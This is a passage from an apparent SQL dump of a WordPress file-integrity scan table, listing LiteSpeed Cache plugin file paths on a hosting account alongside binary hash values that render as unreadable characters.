,US`)UnRfC','',0,'?'),('emWo_^ NE','wp-content/plugins/litespeed-cache/src/root.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/root.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڧRp;n)]','e_rF/;To*-xiq','',0,'?'),('^@ȏLhx cT˿','wp-content/plugins/litespeed-cache/src/router.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/router.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_}*[|2',' gV=>iäT4D(ސ^','',0,'?'),('ͷ?/kYs|','wp-content/plugins/litespeed-cache/src/str.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/str.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']?L$]vUq','a\ZWCmO &mI\'lir7xQ 8','',0,'?'),(';:wK','wp-content/plugins/litespeed-cache/src/tag.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/tag.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2.xk{iDЁ','2t,b3#\0B&7W+V\\(.4 ','',0,'?'),('DZ\\OI \Z\0','wp-content/plugins/litespeed-cache/src/task.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/task.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K$G-u-+ \Z','!+\r!b$bk','',0,'?'),('\n[Z9#\r','wp-content/plugins/litespeed-cache/src/tool.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/tool.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ Nߧ٘\'1)','E$OlkY\02LCʞ(Ҥ\"-C','',0,'?'),(':$,MRa','wp-content/plugins/litespeed-cache/src/ucss.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/ucss.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SdZ f ]š','5keiG ֧s\\0','',0,'?'),('\"FrF9','wp-content/plugins/litespeed-cache/src/utility.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/utility.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B|/d+o/','%T oZzTZ8','',0,'?'),('cUfl','wp-content/plugins/litespeed-cache/src/vary.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/vary.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8!XG5>(*к','E Tmjq079K>5a+m','',0,'?'),('v!]wGm%2D','wp-content/plugins/litespeed-cache/src/vpi.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/vpi.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BTs tl','fbqw:~Kgdu۰׬ר%%','',0,'?'),('xBxsv','wp-content/plugins/litespeed-cache/thirdparty/aelia-currencyswitcher.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/aelia-currencyswitcher.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vBZ-~޴m',':yP/cU;E7^|]hnd 9','',0,'?'),('-+|@\\#D','wp-content/plugins/litespeed-cache/thirdparty/amp.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/amp.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uU`!)Et','6\\[s!m9skP!mɹg$s','',0,'?'),(' h5_/{ܪw','wp-content/plugins/litespeed-cache/thirdparty/autoptimize.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/autoptimize.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' +5BZ','r-hn40Yq 1B5b@\Z~0','',0,'?'),('dCZ̼F%','wp-content/plugins/litespeed-cache/thirdparty/avada.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/avada.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c:ךx6pURw\r','Z7!GnV @xf8\"{Uί','',0,'?'),('*da+Ү\0V','wp-content/plugins/litespeed-cache/thirdparty/bbpress.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/bbpress.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`n ┎+U\\','mDp)(ӥ<bշU裶A:2OK','',0,'?'),('W\ZJkL.d؎','wp-content/plugins/litespeed-cache/thirdparty/beaver-builder.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/beaver-builder.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o \'5H6\"1[','`7Jƾϓ\Zyl}j:X','',0,'?'),('Co[kc\rS{i','wp-content/plugins/litespeed-cache/thirdparty/caldera-forms.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/caldera-forms.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':e)\\+','#\'<|:0&\'q=\"Xp2>','',0,'?'),('JEF#E&, ra','wp-content/plugins/litespeed-cache/thirdparty/divi-theme-builder.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/divi-theme-builder.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kmk?Teήrqj','.sۤnR׾g5w?L٢\"YEE','',0,'?'),('TEH^^/ ','wp-content/plugins/litespeed-cache/thirdparty/elementor.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/elementor.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W~#hd#%kr','RcԐ.GߡWR R4n_','',0,'?'),('&3B9JDhk_','wp-content/plugins/litespeed-cache/thirdparty/entry.inc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/entry.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s2SF=lX5Ls','8^P)z½sv` ZMF ','',0,'?'),('\'y[lj3#~','wp-content/plugins/litespeed-cache/thirdparty/facetwp.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/facetwp.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BE!+Okˆ;','\n\\QyY%Rǯ$*m','',0,'?'),('+E?)Ho','wp-content/plugins/litespeed-cache/thirdparty/gravity-forms.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/gravity-forms.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','63J+B?!','\rG^\"z HTm}','',0,'?'),('|ؓuF','wp-content/plugins/litespeed-cache/thirdparty/litespeed-check.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/litespeed-check.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۀW(I+-','>Ơ\"(\"5Pf9p7','',0,'?'),('k@NM?M','wp-content/plugins/litespeed-cache/thirdparty/nextgengallery.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/nextgengallery.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ,m:M5`ò`i','sߎz|[ʣ{RbgB~X','',0,'?'),('=b}^R[','wp-content/plugins/litespeed-cache/thirdparty/perfmatters.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/perfmatters.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'CCV','f&[Ν<ω¸ځO1nCf ɠ','',0,'?'),('%:V Ho`(Q\"','n$oC :o|\\R U','XcW>#3YЧãқDJṳ','',0,'?'),('XwdGO1#ioG','wp-content/plugins/litespeed-cache/thirdparty/woocommerce.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xFGaHȼ %t','g8il?wzqNŸFLs;π','',0,'?'),('ZDMo+ӺfT','wp-content/plugins/litespeed-cache/thirdparty/woocommerce.content.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.content.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BН)9;T','^+9olPU8w6\rg>5s\n$ee͑','',0,'?'),('}_%v Hf±','wp-content/plugins/litespeed-cache/thirdparty/woocommerce.tab.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/woocommerce.tab.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_&HO\0h','gNRm0;nuVN!q{:','',0,'?'),('vnSn`(0\Z','wp-content/plugins/litespeed-cache/thirdparty/wp-polls.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/wp-polls.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zsnr10!','SEڕpW)84rP%Jt','',0,'?'),('>;`A&HvH','wp-content/plugins/litespeed-cache/thirdparty/wp-postratings.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/wp-postratings.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4 @ Re','=0nT|L%KkW\r','',0,'?'),('\'O3S-\Z2','wp-content/plugins/litespeed-cache/thirdparty/wpdiscuz.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/thirdparty/wpdiscuz.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㝜E䛰&\n^','ڿ^\0[+q[Q','',0,'?'),('#99R4~','',0,'?'),('tmL Ζ.','wp-content/plugins/litespeed-cache/tpl/banner/cloud_promo.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/banner/cloud_promo.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d7Ȉ\\(f','x T]pm\"\'hb','',0,'?'),('\rn -#SتЊq-\nJ-l\\','',0,'?'),('}K9^lwB','wp-content/plugins/litespeed-cache/tpl/banner/score.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/banner/score.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Z 4XISpM','$}ZNGn|D8BdÏCiڮ^4硬','',0,'?'),('X,\"[ \"/','wp-content/plugins/litespeed-cache/tpl/banner/slack.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/banner/slack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2iHZq6','QrN .[,u\0\'','',0,'?'),('\\W^cE\Z;','wp-content/plugins/litespeed-cache/tpl/cache/entry.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/entry.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\n1 quk','EHxh:ZO\0l(?W9ꃱC','',0,'?'),('tLx?\nZWd','wp-content/plugins/litespeed-cache/tpl/cache/entry_network.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/entry_network.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yr\Z9]Sӭ~','68#ȿ4:LSFl\\.b>3(L.;','',0,'?'),('\0T\n3m[OnF','wp-content/plugins/litespeed-cache/tpl/cache/more_settings_tip.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/more_settings_tip.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+*Ѣ!FEN.',' ̿\"ײ!egW;d潏I','',0,'?'),('\r3P(Zg t','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-advanced.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-advanced.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o plEM','Yqe(BהLt \\W> ^p\r','',0,'?'),('OXis}\Z8','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-browser.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-browser.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F}p\\Yyn','N8bWe1#CHctn 5&(','',0,'?'),('z$Q\"a','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-cache.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-cache.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q hTV7\n','p|a\rF\0:\0Q!P\0^','',0,'?'),('_g[M))','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-excludes.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-excludes.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ).LwbA:Ͷ','\Z͚Rh *x\\+I6/+MtnG_','',0,'?'),('.^EX)G\"','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-object.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-object.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߕvX(]','l,&Jcc)cib6\"Cd&^.v','',0,'?'),('!\Z1[','wp-content/plugins/litespeed-cache/tpl/cache/network_settings-purge.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/network_settings-purge.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V0HDO#Tq<','L;o?+VWx&50m(G\0ʾ','',0,'?'),('quAy_G','wp-content/plugins/litespeed-cache/tpl/cache/settings-advanced.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-advanced.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7Op7?','~S &3tl9?D?~iCPZHo','',0,'?'),('g&$GEyz\0ă','wp-content/plugins/litespeed-cache/tpl/cache/settings-browser.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-browser.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F}p\\Yyn','N8bWe1#CHctn 5&(','',0,'?'),('@!v','wp-content/plugins/litespeed-cache/tpl/cache/settings-cache.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-cache.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mh~iVR','VbkɅ O+v+\"[ytPau5','',0,'?'),(':Nte!cDN','wp-content/plugins/litespeed-cache/tpl/cache/settings-esi.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-esi.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r˾qֳ@&)C-U','Q.2:v}I0t9<1CbK','',0,'?'),('%GƢ*A%`,','wp-content/plugins/litespeed-cache/tpl/cache/settings-excludes.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-excludes.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rwFr','G?n#mޢ\ZG ÎH rx 0*','',0,'?'),('r!{zkdM','wp-content/plugins/litespeed-cache/tpl/cache/settings-object.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-object.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߕvX(]','l,&Jcc)cib6\"Cd&^.v','',0,'?'),('NC4Qpb','wp-content/plugins/litespeed-cache/tpl/cache/settings-purge.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-purge.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','szYf,=pp#*%','J;־2DL\Z<7ѓJK$i','',0,'?'),('35*F^`Tp','wp-content/plugins/litespeed-cache/tpl/cache/settings-ttl.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings-ttl.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qdqclm%Xn','YW&8q_]tf7_WW8$+','',0,'?'),('7Ev','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.browser.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.browser.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y2JX','o@+[;n%','',0,'?'),('r#ˁK}','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_dropquery.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_dropquery.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')#\Z&vk03>','6G` e%1q\0,h»\\t','',0,'?'),('V\rXuPѫt','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_favicon.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_favicon.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2r\rvMĠ\"v','T̪]]-F\\\\F','',0,'?'),('ֳ=>ުs͟v','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_mobile.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_mobile.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^k]x*Cu','eWAVܘRyYy`FXI<\r','',0,'?'),('C@]qkw*','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_resources.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.cache_resources.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q&\rpr+\n\'','ydO|q>^|i,o6SFO58V<','',0,'?'),('{Q#& _\ntgUMt','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.login_cookie.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.login_cookie.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O5寅`7GV',']¥kM/K~nfZi?8','',0,'?'),('`wCR\n','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.object.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.object.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͑Ts',':(BTbذ[Ga_gimF\"D#P','',0,'?'),('8GȄr','wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.purge_on_upgrade.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cache/settings_inc.purge_on_upgrade.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iדľO:','?RPvhsSe>qVEk\rl 쐪','',0,'?'),('sܐ\r!l','wp-content/plugins/litespeed-cache/tpl/cdn/auto_setup.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cdn/auto_setup.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ǂr¡ sS\\)*','D>\ZwnEwQ*e hS ','',0,'?'),('\nذܞYBj','wp-content/plugins/litespeed-cache/tpl/cdn/entry.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cdn/entry.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')`I䌕Cjz','Tu6w7k&.\rQOE[dWE','',0,'?'),('p3|\rr9','wp-content/plugins/litespeed-cache/tpl/cdn/manage.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cdn/manage.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D,-y.RIk','y\\v(荒u$U BE\\e%Iw,B','',0,'?'),('q@aHM\'})U','wp-content/plugins/litespeed-cache/tpl/cdn/settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/cdn/settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6=YknfVʔ','l)J+`-H>:Љ?AT\Zi','',0,'?'),('?tM%Ғ','wp-content/plugins/litespeed-cache/tpl/crawler/blacklist.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/crawler/blacklist.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&eOE\Z\"L','EAl\'?ڨ MCݩ=$[tQp','',0,'?'),('\ZJZf\"=\Z;','wp-content/plugins/litespeed-cache/tpl/crawler/entry.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/crawler/entry.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' o>C ^ʐv','RE+WS \\;SevI߅,;','',0,'?'),('=o uW>c.Ч','wp-content/plugins/litespeed-cache/tpl/crawler/map.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/crawler/map.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V8&T$/S','MdƮ:>#&suއ\'','',0,'?'),('+??)','',0,'?'),('&G/\\~؄','wp-content/plugins/litespeed-cache/tpl/db_optm/settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/db_optm/settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zac-','k_UWЁSj\Z˺;n^','',0,'?'),('K۫R஑','wp-content/plugins/litespeed-cache/tpl/esi.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/esi.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$܌ б9,l','\ZyA4}mوLjbQfߘ$0o3','',0,'?'),('0_ϛ0& *[ \\\"','wp-content/plugins/litespeed-cache/tpl/esi_widget_edit.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/esi_widget_edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mVה[3-','jJ)f4!LXX.U\0|ԞH|y','',0,'?'),('%Leا9$\"','wp-content/plugins/litespeed-cache/tpl/general/entry.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/entry.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1|n)Xxp\'','▿+o@bqZ$Sl\n\n*uPS','',0,'?'),('.Ε.&q','wp-content/plugins/litespeed-cache/tpl/general/network_settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/network_settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%EMΕRK2N','^ŜY+w%tJ\"/O6[\")','',0,'?'),('+E>l4,','wp-content/plugins/litespeed-cache/tpl/general/settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0x8F01N','cfxfq\r&,0Yy1\Z2ԙ\Z','',0,'?'),('ժե+<|','wp-content/plugins/litespeed-cache/tpl/general/settings_inc.auto_upgrade.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/settings_inc.auto_upgrade.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~G)w\\+','4r%GAoAs4\Z;c(+*','',0,'?'),('Y m)$ F9','wp-content/plugins/litespeed-cache/tpl/general/settings_inc.guest.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/settings_inc.guest.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\rsT\Z*','ȅȽy؛G|D\Z','',0,'?'),('ėAXsq]','wp-content/plugins/litespeed-cache/tpl/general/settings_tuning.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/general/settings_tuning.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z,DgD\r','OO欆^uDLC:+B','',0,'?'),('A-ڈ.x J','wp-content/plugins/litespeed-cache/tpl/img_optm/entry.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/img_optm/entry.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]s!QL<*g','|VhYWfloF~tb','',0,'?'),(' g{S&','wp-content/plugins/litespeed-cache/tpl/img_optm/network_settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/img_optm/network_settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|i(Rb',' vtc2\\4$| q?¿B$ ','',0,'?'),('VSI-Mso|U','wp-content/plugins/litespeed-cache/tpl/img_optm/settings.media_webp.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/img_optm/settings.media_webp.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xn\nQt','gĮm޾h ibPRduu1','',0,'?'),('\'hu3y@֦h0\r','wp-content/plugins/litespeed-cache/tpl/img_optm/settings.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/img_optm/settings.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P|?`','T)l%|cjmH&ؠYl錰es6K','',0,'?'),('K\Z','wp-content/plugins/litespeed-cache/tpl/img_optm/summary.tpl.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/img_optm/summary.tpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sfkګ#\"߭','[D3\'f~\r+_c8h?','',0,'?'),('؃sϗfg','wp-content/plugins/litespeed-cache/tpl/inc/admin_footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/admin_footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[V~h|i','F0!p(iW{!2g','',0,'?'),('?Y8BlU','wp-content/plugins/litespeed-cache/tpl/inc/api_key.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/api_key.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n8w0E0 :','hn#Ⱦkr٨a\0 A','',0,'?'),('UfBwBHZ','wp-content/plugins/litespeed-cache/tpl/inc/check_cache_disabled.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/check_cache_disabled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fbqVK!DQ*d','g/W @+U?F+Kd-','',0,'?'),('{钃s^τs%','wp-content/plugins/litespeed-cache/tpl/inc/check_if_network_disable_all.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/check_if_network_disable_all.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׻y֙SF',';Gj n;Eova3<\'5cc53k4','',0,'?'),('jpzV^IK','wp-content/plugins/litespeed-cache/tpl/inc/disabled_all.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/disabled_all.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(H1ͅw$','\r\\>fm`0Nz/̵','',0,'?'),('Q`DƁlP|','wp-content/plugins/litespeed-cache/tpl/inc/in_upgrading.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/in_upgrading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7RÎs','ouzMsݡ\ZG\' dsMGl؆<µ','',0,'?'),('$A%aPҜՔ','wp-content/plugins/litespeed-cache/tpl/inc/metabox.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/metabox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zj3iA','n~F\rHr\rum;moztG`zL','',0,'?'),('*ST捭Ne','wp-content/plugins/litespeed-cache/tpl/inc/modal.footer.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/tpl/inc/modal.footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jT|b{| /js','&QV|FO%]ohY6٥\Z 